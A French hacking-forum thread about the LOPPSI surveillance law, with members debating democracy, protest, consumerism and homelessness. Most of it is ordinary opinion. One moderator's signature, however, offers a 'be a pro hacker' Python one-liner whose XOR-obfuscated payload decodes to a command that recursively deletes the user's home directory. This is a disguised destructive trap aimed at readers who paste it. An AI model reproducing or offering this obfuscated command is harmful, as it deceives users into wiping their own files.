Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-12-2010 14:15:20

Grand Hibou
Membre d'honneur

La France passe en version big brother 2

Le gouvernemnt pourra nous surveiller  sans qu'un juge passe par là maintenant, la loi vient d'être voté! Bon je vais me tirer en Chine là le gars! lol

big brother 2 made in France

Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 16-12-2010 14:49:51

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Site Web

Re : La France passe en version big brother 2

Merci pour l'article smile
Attends moi j'arrive lol
Je me demande comment ca va ce finir tous ca hmm .

fete.gif

#3 16-12-2010 15:30:22

Grand Hibou
Membre d'honneur

Ico-Loppsi-10.png

#4 16-12-2010 21:17:48

Grand Hibou
Membre d'honneur

voià d'ailleurs un article de tonton korben sur le sujet

Article de tonton korben

#5 17-12-2010 03:50:54

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Une chose ma fait vraiment, peur dans tout ça.

Vu les dérives, j'éspère que la puce que l'on aura bientôt dans le fi.. tiendra compte des dernière techniques de miniaturisation et qu'elle n'aura pas la taille d'une pastèque :s aïe !!!

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#6 20-12-2010 15:07:20

Grand Hibou
Membre d'honneur

lol

#7 20-12-2010 20:47:29

koala
Membre d'honneur
Lieu : In the sky

sa crains sad

#8 20-12-2010 20:56:47

koala
Membre d'honneur

La france n'est plus une démocratie contrairement a tous ce qu'on peut nous faire croire...j'èspère que dans avenir proche les gens vont se réveiller quitte a faire du grabuge !

#9 20-12-2010 21:45:02

Veidam
Membre Indispensable
Lieu : us

Brrr dis par toi koala on mesure la merde dans laquelle on se trouve...

Enfin j'ai confiance les adultes n'ont pas besoin d'un contrôle (parentale) de l'état, et il vont certainement filer un coup de karcher dans les urnes souhaitons le vivement !!!

#10 21-12-2010 12:21:42

Sopor Aeternus
Membre Irremplaçable
Lieu : ๏๑۩&_SopoR_&
Site Web

koala a écrit :

j'espère que dans avenir proche les gens vont se réveiller quitte à faire du grabuge !

Non c'est Mort,  il y a plus de vieux que de jeunes en France !!! alors comment veut tu qu'ils se réveillent !!

1269116221339.gif

(•̪●) Ubuntu 9.10, FreeboxV6,   Alfa 36H 500, 1000, 2000 Mw  NSU - 11NP10-5,   Yagi 18 Dbi  Omni 21.5 Dbi  (•̪●)

#11 21-12-2010 17:10:20

noireaude
Membre d'honneur
Site Web

koala a écrit :

La france n'est plus une démocratie contrairement a tous ce qu'on peut nous faire croire...j'èspère que dans avenir proche les gens vont se réveiller quitte a faire du grabuge !

Je me permet de te corriger, la France contrairement, a toujours pratiqué la censure et ne dispose pas d'une liberté totale d'expression, ce qui est pour moi la base d'une vraie démocratie.

Même si pour cela impliquerait qu'il faudrait laisser s'exprimer les extrèmes de tout bords oui.

Pour le reste, le grabuge n'a jamais servi à rien si on regarde bien, ou à si peu.

La révolution Française et Mai 68 n'ont rien changé, on a assez de recul pour le constater.

Il faut se rendre à l'évidence mais nuancer tout de même comme l'a souligné un philosophe (je ne me rappel plus de son nom), la démocratie (ou pseudo démocratie smile ) n'est pas le meilleur des systèmes mais on a pas encore trouvé mieux smile.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#12 21-12-2010 19:54:55

koala
Membre d'honneur

En effet on a jamais été entierement en démocratie,mais sa veut pas dire que l'on doit tous accepter pour autant,se rendre a l'évidence d'accord mais pas sur certains sujets...

Pour ce qui est du grabuge je suis pas pour loin de la car je suis moi meme pacifiste mais il y a des limites a ne pas dépasser,exemple(totalement a part je le reconnais):

La réforme des retraites,les gens ont manifesté,des usine ont été bloqué pendant plusieurs jours et pacifiquement pourtant la réforme et passé...

Quand serait t-il si les gens avait montré un peu plus leur colère?(sans pour autant casser le magasin d'un pauvre et innocent vendeur...)

La violence n'est pas une solution mais la fermeté et le mécontentement général du peuple envers le gouvernement peut l'etre je pense.

#13 22-12-2010 17:16:26

Quantique
Membre Hyperactif

Roh la la ça fait peur tous ca !!!

J'espère que ça va pas passer cette connerie hmm

D'ailleurs le Royaume-Uni va adopter un truc de ce genre mais en moins débile.

L'ordinateur quantique est la seule solution pour cracker le WPA en moins de 1s

#14 22-12-2010 22:47:40

noireaude
Membre d'honneur
Site Web

koala a écrit :

En effet on a jamais été entierement en démocratie,mais sa veut pas dire que l'on doit tous accepter pour autant,se rendre a l'évidence d'accord mais pas sur certains sujets...

Pour ce qui est du grabuge je suis pas pour loin de la car je suis moi meme pacifiste mais il y a des limites a ne pas dépasser,exemple(totalement a part je le reconnais):

La réforme des retraites,les gens ont manifesté,des usine ont été bloqué pendant plusieurs jours et pacifiquement pourtant la réforme et passé...

Quand serait t-il si les gens avait montré un peu plus leur colère?(sans pour autant casser le magasin d'un pauvre et innocent vendeur...)

La violence n'est pas une solution mais la fermeté et le mécontentement général du peuple envers le gouvernement peut l'etre je pense.

Pour la réforme des retraites les gens ont manifesté, c'est vrai, ça n'a rien changé c'est vrai, qu'est ce que ça aurait changé si ils avaient montré un peu plus leur colère ?

Je suis pas certain mais je pense que cela n'aurait rien changé, car cette réforme était nécessaire et au fond les gens le savaient.
Après il est clair que dans l'état elle était un brin injuste (c'est un euphémisme) et s'avèrera de toute façon insuffisante à moyen terme.
Le problème dans cette histoire vient plutôt de mon point de vue du fait que l'opposition n'as pas fait son travail est c'est contenté de manifester sans vraiment faire une contre proposition concrète.

D'ailleurs l'opposition en question est plus moribonde qu'autre chose, elle passe plus de temps à se disputer le bout de gras dans des querelles internes qu'autre chose. (tonton t'étais un escroc mais tu nous manque)
Dans ce contexte en l'absence de contrepoids concret, les réformes sont plus faciles à imposer.
Sans compter sur nos ivrognes de syndicalistes qui pour la plus part se sont fait acheter par le patronat et ne servent plus à rien d'autre que de se gaver comme des veaux au passage en faisant vaguement mine de se battre pour l'employé.

Après tu parles de fermeté et de mécontentement, on est d'accord la dessus, le problème est que cela fait un bail que les gens sont mécontents sans pour cela que les choses changent.

Au final que faire alors tu vas me dire ?
Personne n'a la réponse en ce moment, car il n'y en a pas qu'une en fait, mais un ensemble.

Pour ma part deux choses sont importantes néanmoins, il est nécessaire que les Français commencent à ouvrir les yeux regardent plus loin que le bout de leur nez.

Ils ont encore le réflexe de voir les choses au niveau National alors qu'il faut désormais avoir un point de vue plus global, j'entends pas la Européen voir mondial.
C'est pas que cela me plaise, mais c'est une réalité, c'est comme ça.
On a pas mal de choses à apprendre de nos voisins Allemands par exemple.

Le deuxième problème vient ensuite de notre mode de consommation.
On arrête pas de beulger comme des veaux d'un côté et de l'autre on consomme à outrance en engraissant le système à tour de bras qui de son côté nous le rend en délocalisant.

Quand on regarde bien, les états sont sous la coupe des ces grandes multinationales qui dictent leur loi en écrasant le marché afin d'en prendre le contrôle de l'uniformiser et de fixer leurs prix ensuite.
Résultat c'est la fin des petits commerces, des petits artisants des pmi, des pme et l'uniformisation des modes de consommation.

Qui va encore porter ses chaussures chez un cordonnier ? Qui va faire encore réparer sa télé ou autre chose ?
etc etc...

Aujourd'hui on achète à gogo même si on en a pas besoin, on jète à gogo, il nous faut une télé dans chaque pièces, trois consoles de jeux et des tonnes de bouffe dont on jette la moitié.
Tout ça pour engraisser des grands groupes qui tiennent dans leur mains des états endettés jusqu'au coup, ça me parait paradoxale.

Avant tout il faut revoir individuellement notre façon de vivre et surtout de consommer pour commencer à faire bouger les choses.

Dernière modification par noireaude (22-12-2010 22:49:26)

#15 22-12-2010 22:57:50

Squaks
Membre Irremplaçable

En même temps, il faut déjà que les gens se rendent compte qu'ils SONT en surconsommation ! Et ça c'est pas gagné ...

Sharkoff

#16 23-12-2010 06:50:38

noireaude
Membre d'honneur
Site Web

Squaks a écrit :

En même temps, il faut déjà que les gens se rendent compte qu'ils SONT en surconsommation ! Et ça c'est pas gagné ...

Très juste, tu mets le doigts la ou ça fait mal et j'ajoute que même si ils s'en rendent compte encore faut il qu'il y renonçent.

Je résume toujours les problèmes auquels notre société et nous même devons faire face par une phrase bovinement simple.

"Tant que les gens voudront des tomates en hiver, on aura des problèmes"

#17 23-12-2010 13:29:18

Quantique
Membre Hyperactif

noireaude a écrit :

"Tant que les gens voudront des tomates en hiver, on aura des problèmes"

Oui mais déjà faudrait que la PAC bouge un peu son c.l pour arrêter cette production intensive qui ne sert plus à rien de nos jours. Enfin si plus avoir de goûts de nos aliments etc... je vais pas continuer parce que j'en ferais des pages.

Bon je pense qu'ont dérivent un peu du sujet là roll

L'ordinateur quantique est la seule solution pour cracker le WPA en moins de 1s

#18 23-12-2010 18:02:48

noireaude
Membre d'honneur
Site Web

Quantique a écrit :

Bon je pense qu'ont dérivent un peu du sujet là roll

Je ne pense pas, si internet ne représentait pas une manne financière qui reste à exploiter, il ne se donneraient pas tant de mal à tenter d'en prendre le contrôle, tout est lié.

Il faut se forcer à voir les choses de manière plus globale, afin de pouvoir lutter contre les dérives de manière adéquate.

Dernière modification par noireaude (23-12-2010 18:04:22)

#19 15-01-2011 00:23:12

spawn
Modérateur

Pour en revenir à la politique et au machiavélisme, je dirais bien
qu'à défaut de gouverner avec justice, il faut gouverner avec justesse.

J'ai bien lu vos remarques. A propos du prix d'Internet (de la connexion), j'aimerais rêver un peu:
Imaginez internet gratuit pour tous, n'importe ou par n'importe quel protocole.
Imaginez internet sans censure politique. (mais morale tout de même non ?)
Imaginez la fin du téléchargement illégal, le retour aux bonnes vieilles K7.
Imaginez l'humanité Ubuntu.
..
(toute ressemblance avec une quelconque chanson serait fortuite  wink)
Je suis plus ou moins d'accord avec vous.
Si on lit les Grecs et que l'on regarde entre eux et nous, on apprend plein de choses :
Les hommes évoluent peu. Les grandes révolutions meurent beaucoup.

Alors bon, filtrer Internet.. Qui est surpris ?
Et si au niveau global (dans le sens 'du globe') Internet devenait service public ? Comme les PTT à l'époque ?

ps: Notons que peu de monde a affaire à Internet, (globalement)
pps: Internet est pavé de bonnes intention, ne l'oublions pas big_smile.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#20 15-01-2011 10:26:01

noireaude
Membre d'honneur
Site Web

spawn a écrit :

Si on lit les Grecs et que l'on regarde entre eux et nous, on apprend plein de choses :

salut wink

La plus part des gens ne lisent plus. (surtout les hommes)

J'ai constaté de manière général que les classes moyennes inférieur et supérieur s'appauvrissent intéllectuellement.

Essaye d'entamer une conversation qui sorte un peu de l'ordinaire, ils t'envoient bouler, plus rien ne leur donne envie de se stimuler les neurones en dehors de leur deux ou trois centres d'intêret (qui souvent ne prêtent pas à réfléchir).

Boulot, dodo, mange, dort et ch....

Par contre c'est les premiers à beugler en général.

Dernière modification par noireaude (15-01-2011 10:31:09)

#21 15-01-2011 13:06:22

koala
Membre d'honneur

La plupart des gens sont egoistes,ne savent pas ce qui veulent et se plaignent des qu'un truc marche pas sans avoir essayé de comprendre le pourquoi sa ne marche pas...
On rencontre de moin en moin de gens pur,j'entends par la ouvert respectueux et désirant d'apprendre.
Ce siecle et aussi,pardonnez moi l'expression,le big brother des cons.

#22 15-01-2011 14:51:03

noireaude
Membre d'honneur
Site Web

koala a écrit :

Ce siecle et aussi,pardonnez moi l'expression,le big brother des cons.

Pas faux, même si je ne sais pas si on l'entend de la même manière.

De toute façon comment tu veux lutter est éduquer les gens sur leur liberté quand tu en as déjà 500 000 0000 qui sont allés tout heureux se ficher eux même sur Facebook  ?

Sans compter qu'il y en a encore bien plus que ça qui vont utiliser du logiciel privateur en toute connaissance de cause.

Ils préfèrent perdre le contrôle de leur ordinateur (qui dès lors ne leur appartient plus), ou confier des données personnelles à un tiers via les coulds par simple commodité.

Je prône pas le comportement inconditionnel de Richard Stallman, car je suis bien conscient que cela demande une force de conviction que seul peu de gens peuvent avoir sur la durée moi même je n'y arrive pas vu que j'autorise java de temps en temps dans mon navigateur, que j'utilise Skype, et quelques composants privateurs.

Ce que je prône en revanche c'est d'essayer dans un maximum de cas de faire le maximum pour préserver ses droits et donc d'utiliser un maximum de logiciel libre.

Sortit de la Il est vrai qu'hadopi, lopsi, acta sont des dangers, mais la réalité est que même si ça fait râler les gens, au final ils s'en foutent, ils vont comme à chaque fois se résigner et comme à chaque fois se la faire mettre avec le sourire.

La liberté d'expression et la liberté tout court n'existent plus depuis longtemps déjà, les gens oublient qu'ils étaient déjà fichés dans des bases de données bien avant Internet, fichers clients, carte bleue, prélèvement automatique, fichers d'administrations etc etc ...

Le simple fait d'avoir une pièce d'identité est déjà une entrave à la liberté individuelle d'aller et venir.

Même la vieille peau de voisine qu'on a tous et qui squatte son rideau pour guetter les allées et venues des gens de son immeuble est une entrave à la liberté individuelle d'aller et venir sans avoir à rendre de comptes.

Les nouvelles lois visant à prendre le contrôle de l'écosystème numérique sont certes injustes et dangereuses, pour la liberté d'expression surtout (enfin ce qu'il en reste) , mais finalement big brother est déjà la depuis longtemps, il fallait être naïf pour croire qu'internet y échapperait, et avant internet ça n'a pas dérangé beaucoup de monde.

Dernière modification par noireaude (16-01-2011 10:13:53)

#23 15-01-2011 20:54:06

koala
Membre d'honneur

Bonne explication global, le pire dans tout sa c'est que la résignation des gens et un virus qui résigne le peu d'individu doter d'une cervelle,car si on discute de sa c'est que sa nous interpelle et qu'on en a pas rien a faire pourtant au fond de nous on sait que l'on a pas le choix et que certaines lois vont en cacher d'autre et que il faudra s'y faire...

Cependant pour faire ouvrir les yeux aux gens et en cas de soulevement général je serait le premier a dire STOP haut et fort dans la rue!

#24 16-01-2011 11:27:50

noireaude
Membre d'honneur
Site Web

koala a écrit :

Cependant pour faire ouvrir les yeux aux gens et en cas de soulevement général je serait le premier a dire STOP haut et fort dans la rue!

Aujourdhui c'est Dimanche et Dimanche c'est pavé smile

Et après ?

Cela c'est déjà fait par le passé, la révolution Française, Mai 68, le "plus jamais ça" après la deuxième guerre mondiale, plus près de nous la crise financière qui à fait s'élever les "bonnes consciences" qui ont prôné le changement radical de notre système financier.

Dans le présent cela se fait encore tous les jours, la France est le pays ou il y a le plus de mouvement de grève et de manifestations, il doit bien en avoir trois ou quatre toutes les semaines sur l'ensemble du territoire.
Pour quel résultat ? Que dalle, il y en a tellement qu'au final plus personne n'y fait attention (sauf quand il sont directement concernés).
Quand on regarde bien, rien ne change et quand cela change, le temps fait que les travers reviennent et que tout repart de plus belle pour souvent être au final pire qu'avant.

Un exemple qui n'a rien à voir avec le post à première vue mais qui reflète bien le comportement des gens en général dans leur manière de sois disant se battre pour ce qui leur semble injuste.

Prenons l'exemple des sans domicile fixe.

Il y a des campagnes tout l'hiver qui font que soudain les gens s'émeuvent de tous les côtés en se disant "mon Dieu ils doivent avoir froid et fin" en trouvant ça trop injuste.
Le battage médiatique du 115 commence au premier flocon.
Pour moi , ce n'est pour les autorités qu'un moyen d'utiliser le citoyen comme arme de délation, visant à les aider  à localiser plus facilement les gens qui dorment dans la rue, histoire de les mettre au chaud manu militari si il le faut.
Ca ferait trop désordre un maccabé dans la rue, qui plus est mort de froid.

Par contre à 07H00, hop à la rue, il faut qu'il dégage de la jusqu'au soir suivant, si il y a de la place.
Mais tout le monde à bonne conscience et peut aller se pieuter tranquille.
Au final après tant de beaux sentiments qu'est ce qu'on a fait pour lui ? Rien, il aura pas de logement pour autant, il retourne dans la rue comme un chien.

On a juste mis le problème de côté pour éviter les critiques et se donner bonne conscience.

A la fin de l'hiver par contre, dans certaines de ces communes les élus vont même jusqu'à faire valoir des décrets qu'ils ont mit en place interdisant l'accès à leur dite commune aux sdf que l'on a tant "choyés" l'hiver.
Pas déconner non !!! Faut pas faire fuir le touriste, les clodos au centre ville ça fait pas propre, pis leur chiens il les tiennent même pas en laisse quoi !!!

Dans le même temps le citoyen aimant et plein de compassion va vite préparer ses vacances dans le sud ou à Agadir en oubliant tous ces gens.
Faut luster les boules de pétanque ça urge plus ça.
Eh oui madame, en été les sdf ont pas besoin de maisons et n'ont surtout pas besoin de bouffer c'est bien connu non ? (nous assez fais chier tout l'hiver)
Même si toutes les statistiques médicales des services concernés montrent que le nombre de décès de ces populations fragiles sont supérieurs en été.

Pis d'toute façon on a les Roms à gicler d'la !!!

Les médias aussi s'en foutent, l'hiver est passé, place aux reportages sur le buisness des vacances pas chères, les dévrives sur les conditions d'hygiène dans les hôtels et les restaurant ou la chasse aux canards dans le bassin d'Aracachon.

Cette année pour exemple ils ont passés un reportage sur le manque d'ygiène dans les restaurants chinois et autres, qui datait de 2005 (histoire de foutre la trouille inutilement aux gens).
Bref les médians ne sont plus bons qu'à faire du blockbuster ou peur aux gens, en entretenant le malaise ambiant.
Ou alors bon à faire du sensationnel, je prend exemple sur une chaîne de la tnt, qui commence par "W" j'ai pu voir plus d'une vingtaine de reportages différents mettant en scène tous les services de police, de l'armée, un tas de reportage sur la délinquance (mettant encore bien sur en avant le travail de la police) et aucun sur les sdf.

Les gens s'en foutent des sdf, ils veulent voir de l'action, du sensas, regarder 30 veaux entrer dans une baraque à 06H00 du mat en beuglant et en avoinant tout ce qui bouge (même si certains l'ont sans doute mérité), c'est quand même plus drôle que la vie de pompon le sdf et de son clébard ou un reportage sur la misère des smicards qui peuvent plus payer leur loyer. (Et qui risquent bien de rejoindre pompon un jour ou l'autre)

Les médias sont devenus en partie les pires minables de notre pays, dans le sens ou ils ont tous pour relayer les injustices et éduquer les gens et qu'au final ils se contentent de faire du pognon en balançant de la m.. à la télé.

Tout ça pour dire quoi aui final ?
Un soulèvement général et gueuler ne sert à rien si les comportements fondamentaux ne changent pas.
Agir à titre individuel dans un premier temps et collectivement ensuite en revanche est utile.

A ce titre tu remarqueras que les gens qui agissent dans certains domaines, prenons le cas des sdf par exemple (bien que le cas des logiels libres seraient plus en phase avec le post) , sont les associations dont on ne parle presque pas constituées de beaucoup de bénévoles qui sont souvent des retraités ou des gens eux même en difficulté et qui le font en toute humilité et dans l'ombre quasi totale.

C'est gens la sont bien plus efficaces que ceux qui vont beugler dans un cortège entre deux bières et une merguez.
Ils ne font pas de bruit mais pas leur actes concrets et bien qu'ayant un portée limitée ils contribuent à faire en sorte que le monde soit meilleur ou simplement vivable pour d'autre gens qui en ont besoin et qui sans cela couleraient complètement.

Je le répète donc encore une fois Lopsi, hadopi, acta etc etc, c'est dangereux on est bien d'accord mais pourquoi s'en offusquer et aller manifester et essayer d'ameuter les foules alors qu'elles on depuis bien longtemps déjà accepté de vire dans une république pratiquant la censure ?

Le plus grand danger est avant tout que l'on vit dans une société malade, avec des gens malades, des esprits malades, un modèle morribond et un avenir qui va surement nous mener à notre propre perte à une vitesse bien plus rapide que les lois sur le numérique ne nous priverons de nos libertés, que nous avons déjà au passage perdues depuis très longtemps sans vraiment nous en rendre compte.

Beugler ne sert à plus rien, ils nous faut revoir notre propre façon de vivre de façon individuelle et collective, se remettre en question prôner l'insoumission, refuser le modèle qu'on nous impose.

Et surtout le plus important est pour l'heure d'éduquer ceux qui viendrons après nous, car pour nous c'est déjà quasiment trop tard on est trop intoxiqués.

J'insiste bien sur le fait que cela doit se faire dans le calme, sans violence, sans manifester inutilement contre un système qui de toute façon s'en fiche.
Ceux qui le dirigent on de toute façon fait leur beurre, ils ne sont attachés qu'au pouvoir, tu ne peux avoir aucune emprise sur ces gens la, ils ne vivent que pour eux, ayant déjà tout gagné la seule chose qu'ils pourraient encore perdre c'est leur fierté.
Et tout le monde le voit bien, en politique la fierté ça n'existe pas, problème réglé donc.

En revanche chacun est maitre de sa vie de ses idées et libre de s'affranchir de se système de globalisation, mondialisation qui certes nous apporte une relative sécurité au niveau étatique mais à quel prix individuellement afin de vivre comme il l'entend.
Attention, je ne suis pas contre une mondialisation sur le principe, je suis contre la mondialisation telle qu'on la vit en ce moment et qui ne vise qu'à accroitre les bénéfices des grands groupes industriels au détriment des gens modestes qu'on laisse sur le carreau, sacrifiés sur l'autel des bénéfices pour engraisser une poignée d'actionnaires et un système bancaire qui ne cherche que le profit à court terme et non la pérennité.

Le seul impératif est d'être suffisamment nombreux pour que cette idée soit viable et avoir assez de conviction pour en assumer les difficultées.
Une des difficulté dans ce cas serait de s'affranchir du matérialisme qui nous empoisonnent et nous rend dépendants des 1% de gens qui détiennent les richesses mondiales et donc notre pseudo confort.
Nos arrières grands parents vivaient dans un confort plus sommaire mais je doute fort qu'ils aient été plus malheureux que nous, bien au contraire.

Quitte à être interdépendants, ce qui constitue moins un frein de mon point de vue qu'une sécurité et une stabilité au final, autant l'être vis à vis de nos voisins avant tout, que de gens ou d'entités dont on ne sait rien ou si peu et sur lesquels on abandonne tout contrôle.

L'idéale serait une société de proximité au sens large du terme restant ouverte sur l'extérieur (à l'échelle Européenne par exemple et mondiale pourquoi pas), mais ou son ouverture ne se résumerait plus aux seuls aspects purement économiques et financiers.
Mais plutôt à un échange de savoir et de compétences, et avec un commerce équitable, afin d'atteindre une complémentarité out tout le monde y trouverait son compte et du boulot.

Berf un mixe entre la démocratie et le communisme avec en prime un capitalisme "responsable" .

Faire pousser des tomates à un endroit, les faire expédier dans un autre pays pour les trier et les emballer en mettant au chômage ceux qui se chargeaient de ça avant.
Pour finalement les réexpédier d'ou elles viennent afin de les revendre (à l'emballeur de tomates qu'on a viré et qui de toute façon ne pourra plus s'en payer) ou de les exporter, c'est tout sauf du capitalisme responsable.

C'est juste du gaspillage d'argent, de ressources et c'est de mon point de vue bien plus dangereux que toutes ces lois sur le numérique à court terme pour notre vie de tous les jours.

Dernière modification par noireaude (16-01-2011 13:12:49)

#25 16-01-2011 14:03:25

koala
Membre d'honneur

Je suis entierement d'accord avec ton discours et l'exemple des sdf et bien choisi, si les gens aiment les voir en chier a la tv mais les ignore en passant a coté c'est a mon avis car ils ont une espèce de phobie intérieure a se retrouver dans la meme situation un jour.

Pour avoir vécu moi meme avec eux pendant un temps je peux dire que c'est des gens tous a fait normaux qui cherchent(pour la plupart) a s'en sortir.Et pour moi, les plus belles rencontres se sont faite dans cette période de galère.

La société ne pardonne plus,une erreur de parcours et on est jugé catalogué et critiqué.Performance=Bénéfice
Perte=licensiment, l'argent rend tous le monde "malade" pour ceux qui ne l'était pas déja avant.

Pour ma part je suis encore jeune et je tiens bien a profiter de la vie... a ma façon smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.036 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]